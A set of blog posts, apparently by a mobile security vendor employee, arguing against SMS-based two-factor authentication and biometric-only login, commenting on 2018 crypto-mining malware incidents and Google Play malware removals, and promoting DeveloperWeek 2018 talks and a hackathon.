Do you need another reason to stop using SMS for 2FA?

In an age when data is gold, and marketing is a way of life, you still probably don’t want to receive marketing on your mobile phone.  I always hate having to register for events or downloads because I know that email address is going to get sold and then I am going to start receiving my fair share of spam.  I bet most of my readers probably have a separate email account setup just for this reason.

Over the last year or so, I have noticed that I am getting more and more telemarketers calling my mobile phone.  Now I also know that I have been putting my mobile phone number into more sites than my home number simply because its where I can typically be reached.  This has lead me to start having a “spam” mobile number, just so I can filter out all of those unwanted calls more easily.

After reading about a Facebook user that started receiving SMS spam after registering for Facebook’s 2FA, I now know to use my “spam” mobile number for those sites that I can’t use real 2FA on.  This is just a new encouragement for me to search these sites and see if I can find a real One Time Password application or a good FIDO U2F hardware device.  If your account hasn’t been hacked by leveraging SMS for your 2FA, now it might be sold to the highest bidder so you can get spammed on it.  It’s time to stop using SMS for 2FA, find a better solution.

 

After writing and scheduling this story, I found a response from Facebook stating that the SPAM to the security SMS number was in fact an error.  For me, this does not change the fact that SMS is still insecure and easily hack-able and should not be used if other more secure options are available.  In the case of Facebook, you can use their mobile app to generate One Time Passcodes and they will send you secure push notifications, and I would highly recommend using both of those options over just the SMS 2FA option.

Yet another crypto hack, protect yourselves

Over the last 6 months, the most prevalent news stories in my news readers are those about the increase in crypto-mining malware incidents as I commented on a few months back.  They are literally happening weekly and maybe even daily.  Last week I presented data on the fact that we are seeing a massive rise in phishing attacks.  These phishing attacks are targeted attacks, also called spear phishing.  They are targeted at companies and individuals in order to get crypto-mining software in more locations.  Getting the crypto mining bots on as many systems as possible, by leveraging traditional attack methods such as phishing, are  major headaches for all companies and individuals out there.

The crypto currency explosion has brought everyone from every corner.  Most people associate Bitcoin with crypto currency, but there are many others out there.  All of these crypto currencies are a great way to anonymously move money.  Back in the days of early phishing, a hacker or a hacking team would go out and steal usernames and passwords and then they would sell them on the black market.  There were many points at which they could get caught here, and the old adage of “follow the money” was the most common.  With the usage of crypto currencies, now the hackers to move the money more secretly.  However, there were still problems and spots where they could get caught, and rather than seek payment for services, I think everyone would agree that if you could just generate your own currency and avoid the middle people, that would be much easier.  That’s exactly what the hackers have thought too.  So now the name of the game is to get crypto mining software on anything that has a CPU, and phishing to get privileged credentials is less about selling them to others and more about being able to immediately use them to get the mining software loaded and making money for them.

This week, Telsa’s cloud servers were compromised and crypto mining bots were loaded on their Amazon Web Services.  There have been a number of high profile companies recently that have been compromised, but less big headlines around them.  The main reason for this, is that these companies, although compromised the hackers don’t necessarily leak the data contained in those servers.  That is not to say the data isn’t compromised in most cases, just that getting the crypto mining bot up and running is more the focus and the intelligence community knows this.  So why bring more panic and attention rather than just stop the malware in its tracks.

With knowing what the attacks are focused on, we should adjust our security to protecting for this.  Crypto mining bots are being added to Cloud Server where there is almost unlimited processing power.  They are also being added to web sites as file-less attacks, or drive by attacks, allowing for every visitor to give a bit of their processing power to the mining malware collective.  And we are seeing many main stream (and not-so-mainstream) mobile apps repackaged to include these mining malware bots, typically in a hidden mechanism that the end user would never even notice until their device slows down and is unusable due to the mining operations.  There are still other platforms that are being attacked including IoT (like your wireless cameras and wifi connected thermostats) and big industrial systems (SCADA) used in utilities and manufacturing.  Each attack-able platform needs to make use of the appropriate tools to help combat these attacks. I pointed out last time that it’s important to be up to date with your patches and to pay close attention to your data.  These recent attacks make it even more visible.

***Edit adding more missed hijacked sites***

I missed the UK government one:
http://www.bbc.com/news/technology-43025788

Or the list of 4300 other web sites that have been infected:
https://publicwww.com/websites/browsealoud.com%2Fplus%2Fscripts%2Fba.js/

Los Angeles Times:
https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html

Too busy to blog…but come see my webinar

It’s been a busy couple of weeks since the DeveloperWeek conference.  There has been no shortage in security related news, with lots of predictions becoming realities for 2018. Unfortunately my work and real life have caught up with me and limited my weekly posts.  Don’t fret, I am coming back.  And if you miss me, come sign up for my webinar: register online here.  I’ll be covering all of my favorite Application Shielding and Hardening reasons to use it and all of the DIGIPASS for Apps tools and where to use them.  Bring your questions and I’ll answer all of them.

Multi-factor, not just biometrics.

Biometric authentication is fairly common place today.  Just about everyone knows how to use the Fingerprint scanner on most modern smartphones.  With the newer phones, facial scanning has started to take the place of the fingerprint.  And some Mobile Apps that are trying to up their security beyond the builtin platforms have included iris scanning.  Biometrics check off the “ease of use” and “strong security” check boxes most of the time.

Where it starts to fall apart is when application owners start to implement only biometrics.   For years security experts have been telling applications that they should be implementing multi-factor authentication.  This means they should be pairing two different authentication technologies from at least two different factor groupings.  As a refresher, there are three authentication factor groups, “Something You Know”, “Something You Have” and “Something You Are”.  Taking two technologies from the same factor does not mean you have multifactor, you must have at least two technologies from different factors.  Biometrics fits into the “Something You Are” factor grouping and is a single factor technology.

Today a great write up on the attack vectors that are currently plaguing the most common biometric technologies was published on DarkReading.  The attacks have been around for a while, but they still work.  When you read the article, it impressive as to how simplistic these attacks really.  Biometrics are an advanced technology, and yet a piece of paper, or a gummy bear is all that is needed to break them.  These attacks will be mitigated and solved and new versions of the products will be released, but then that will just invite new attacks.  Nothing is completely secure from some style attack, it just takes longer to find the appropriate attack vector.

Application owners should see these attacks and think back to attacks on static passwords, and on SMS passwords and all of the other authentication attacks.  When you take one from of an authentication factor, there are probably a few different attacks against it.  However, when you start to combine the technologies across the different factors of authentication, the attacks are much harder and even some of them are next to impossible.  The best applications implement multifactor authentication in ways that only call attention to them when it is needed (or detected), and allow a user to continue to do what they need to without being impacted all the time.

Developer Week 2018 opens today

Monday morning in Oakland, California and Developer Week 2018 has started.  Registration is going well, and my colleague, Michael Williams, and I are all setup and ready to give our talk tomorrow.  Our talk is on Tuesday from 3:00 to 4:30PM on the second floor in room 208, Workshop Stage 5.  We’d love to fill the room and get everyone in to hear about VASCO Data Security’s latest DIGIPASS for Apps mobile SDK’s and eSignLive SDK’s.  We will take you through how to leverage the free to trial DIGIPASS for Apps API’s to help extend the your apps features and build small security steps on your way to creating a fully trusted and secure mobile app.  We will also help you with implementing a full digital signature workflow moving your app towards a complete electronic document processing implementation.  In the end we hope to leave you with information on how to use all of our technologies to enhance and speed up your mobile app strategy by giving you a number of new tools you can use in your daily development lives.

We hope to see you there, and questions are always welcome!

 

Hackathon @DeveloperWeek 2018 eSignLive by VASCO Winners!

Congratulations to our winners!

1st Place:

Esfer – This team decided to tackle the legality of Peer to Peer payments.  They created a beautiful prototype of a mobile application where a requester could create a legal document using the eSignLive SDK and send that to the payee where the payee would then sign the document and accept the terms and complete the transaction.

2nd Place:

VMatch – This team decided to make a mobile app to connect Conference Organizers with Volunteers.  It included a video conference component to interview candidates and then used the eSignLive Android SDK to create a volunteering contract with the organizer.

Great Apps!

Hackathon Day 2 – Let’s see your projects!

Start of the @DeveloperWeek 2018 Hackaton day 2.  We saw some amazing starts yesterday, so very innovative products and cool uses of our eSignLive SDKs.  Today, we hope to see some of these projects get to a finished state.  You can still register your project online at the show website: http://accelerate.im/challenges/179.  We will be announcing our winners this afternoon, so make sure you get those projects completed for the judges.  If you are looking for our table, we have moved to the second floor, come up and ask us anything.

On a side note, Congratulations @TomBrady MVP, GOAT, and let’s go @Patriots!

$4000 in prizes this weekend, Hackathon @DeveloperWeek in San Francisco

Here we are, hanging out with a huge group of developers in SoMa.  There is a ton of cash on the line from over 20 vendors.  We are here offering $4000 in Amazon Gift cards, $2000 for the first place winner (and you can get an extra $250 if you use the mobile SDK’s) and $1000 for the second place winner (and the same extra $250 for mobile usage, and finally 4 prizes of $250 for the best Reporting Dashboards out there.  So if you’re a developer and need some cash this weekend come down and give it a shot.

Great crowd and some awesome ideas floating around.  It is awe-inspiring to watch all these developers at work on different projects at once.  I had a colleague from another vendor take a trip down memory lane and just how much the tech space has changed.  We both worked for internet startups in the early 90’s during the beginning of the Internet.  Things have come a long way.  To get this many developers in one spot all working on problems and solutions that are for all different walks of life, things have certainly advanced.

There is still plenty of time and I’m sure there are plenty of problems out there that need solutions.

Google is doing their part, but it’s still not enough

A few weeks ago, I posted some statistics about the state of mobile application security.  Specifically a report showed that malware grew over 60% in just the last quarter of last year and the Google Play Store alone published over 9 million new mobile applications last year.

This week Google published that they had removed over 700,000 malicious apps from the Google Play Store.  This is highly commendable, as it shows a firm commitment from Google to help improve their security image.  I think that is what everyone is overlooking, this helps improve the Android Platform security image. The removal of these apps from the closed application publishing service that Google provides is just a drop in the bucket in terms of the actual malware being published for the mobile platforms.  As my colleague points out in his LinkedIn post, apps can be downloaded and installed from many different app publishing stores and often are.   The Android platform has an image of being more open, and because of this, it is also widely linked to being considered as less secure than the Apple platform.

Attacks exist on both the iOS and Android platform, and pretty much any platform that has a CPU.  With the Android platform being more open and more flexible, it is probably always going to be more open to attack, or at least publicized attacks.  With Apple and with a number of the other computing platforms out there, they are all more closed, so we are less likely to hear about the attacks until something big happens or the media gets a hold of it.

Taking a stance that the platform you are developing is secure enough without implementing secure controls within your own app is dangerous and negligent. Google and Apple do their part, but the entire app development community needs to be vigilant.  Understand that, while the platforms publish big numbers and clean up their images, this is more about attracting more developers to their platforms, and less about the actual security of those platforms.  Attack vectors change constantly and arrive at different platforms in many different ways, sometimes in control of the OS provider, sometimes not.  As long as developers take the time to implement all of the security controls at their disposal, perhaps your app won’t wind up on the list of breached apps next time.

Join me at DeveloperWeek in San Francisco

Just a quick post to encourage anyone in the San Francisco area this weekend and next week to come down to the DeveloperWeek conference and meet up.

Over the weekend I will be attending and helping host an event at the Hackathon.  If you want to play with some new mobile development tools or your interested in cloud digital signature products, come over and give our Hackathon a try.  There are some great prizes for the best projects.  Read more about the event and register for it over here: http://accelerate.im/challenges/179

And if you can’t get out to the Hackathon, but you still want to learn more about #DevOpSec or just want to know more about the latest tools in mobile application security, come attend our discussion on Tuesday from 3 to 4:30 PM.  We will give you a run down of some of the tools we are giving free access to and then take you through some samples and answer any and all questions.  Register for the discussion and more information can be found here: http://sched.co/DGVX

It should be a great show, and there will be a lot of like minded people around.  Stop by our booth at number #203